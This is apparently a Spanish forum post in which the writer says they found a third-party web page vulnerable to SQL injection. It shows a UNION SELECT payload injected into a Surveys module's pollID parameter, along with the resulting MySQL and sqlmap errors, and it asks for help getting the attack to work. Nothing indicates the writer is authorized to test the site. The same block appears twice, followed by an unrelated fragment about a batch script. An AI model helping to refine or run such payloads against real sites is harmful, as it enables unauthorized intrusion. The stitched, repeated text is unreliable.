Encontre una pagina que tiene una vulnerabilidad SQL:
el servidor es un MySQL tengo los detalles del servidor y toda la cosa
estos son los parametros que inyecto:
----> '4+and+1=0+union+select+1+from+votos+--+
a esta linea
----> modules.php?name=Surveys&op=results&pollID=
cuando lo hago obtengo el resultado siguiente:
Encuesta
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:
[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'; or 'access://database_filepath'
el servidor es un MySQL tengo los detalles del servidor y toda la cosa
estos son los parametros que inyecto:
----> '4+and+1=0+union+select+1+from+votos+--+
a esta linea
----> modules.php?name=Surveys&op=results&pollID=
cuando lo hago obtengo el resultado siguiente:
Encuesta
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/***/***/***/sql_layer.php on line 301 (por supuesto los asteriscos los puse yo para cubrir datos que considero sensible)
estare haciendo algo malo, y no me digan que pase el sqlmap, ya lo hice y lo unico que dice es:
[18:32:04] [CRITICAL] invalid target details, valid syntax is for instance 'mysql://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME'; or 'access://database_filepath'
.
la version 'B' no es la gran cosa pero recuerden que es batch :S
seguire practicando en este lenguaje de scripting tan facinante como es batch
ya estoy trabajando en la version "B" de este code, les pido que si dedican su tiempo a leer este codigo se detengan un poco a darme algunos consejos para asi aplicar lo aprendido en codigos futuros....de antemano gracias... 